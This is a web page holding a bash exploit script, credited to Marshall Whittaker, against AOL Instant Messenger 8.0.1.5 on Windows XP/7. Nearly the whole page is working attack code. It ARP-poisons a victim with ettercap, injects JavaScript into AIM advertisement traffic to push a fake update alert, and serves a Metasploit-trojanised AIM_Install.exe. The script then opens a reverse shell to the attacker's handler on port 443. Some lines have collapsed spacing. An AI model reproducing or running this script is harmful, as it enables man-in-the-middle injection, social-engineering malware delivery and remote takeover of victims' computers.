Home AOL Instant Messenger 8.0.1.5 Exploit on Win XP/7
Page
AOL Instant Messenger 8.0.1.5 Exploit on Win XP/7
#!/bin/bash### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.### Leverages binary file planting to My Documents via AIMs advertisement code.### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.### Marshall WhittakerATTACKER="192.168.2.10";VICTIM="192.168.2.5";GATEWAY="192.168.2.1";REVPORT="443";PAYLOADSITE="https://dl.dropboxusercontent.com/s/dykenlhdobchjjv/AIM_Install.exe?token_hash=AAE2qGWSZAlAWJKepUu_2fP5UZfg-JTHktBGuu-I4BV34Q&dl=1";mkdir ~/aimpwn;echo"if (tcp.src == 80) {"> ~/aimpwn/aimpwn.filter;echo"if (search(DATA.data, \"atwola\")) {">> ~/aimpwn/aimpwn.filter;echo"replace(\"_blank>\", \"_blank><script>alert('A new version of AOL Instant Messenger is available!');window.location = '$PAYLOADSITE'; setTimeout(function(){alert ('Navigate to your My Documents folder and start the installer by clicking AIM_Install and follow the steps.');}, 1000);</script>\");">> ~/aimpwn/aimpwn.filter;echo"msg(\"PWNT.\n\");">> ~/aimpwn/aimpwn.filter;echo"}">> ~/aimpwn/aimpwn.filter;echo"}">> ~/aimpwn/aimpwn.filter;
etterfilter ~/aimpwn/aimpwn.filter -o ~/aimpwn/aimpwn.ef;### wget section.#wget http://download.newaol.com/aim/win/AIM_Install.exe -O ~/aimpwn/AIM_Install.exe;cp ~/aimpwn/AIM_Install.exe /opt/metasploit/apps/pro/msf3/data/templates/;
msfpayload windows/shell/reverse_tcp LHOST=$ATTACKERLPORT=$REVPORT R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -x AIM_Install.exe -t exe -e x86/call4_dword_xor -c 2 -o ~/aimpwn/AIM_Install.exe;### Uncomment wget section and put code to upload AIM_Install.exe to a site if you need to### change ATTACKER IP or port.
ettercap -T-F ~/aimpwn/aimpwn.ef -q-M arp:remote /$GATEWAY/ /$VICTIM/ &
msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=$ATTACKERlport=$REVPORT E;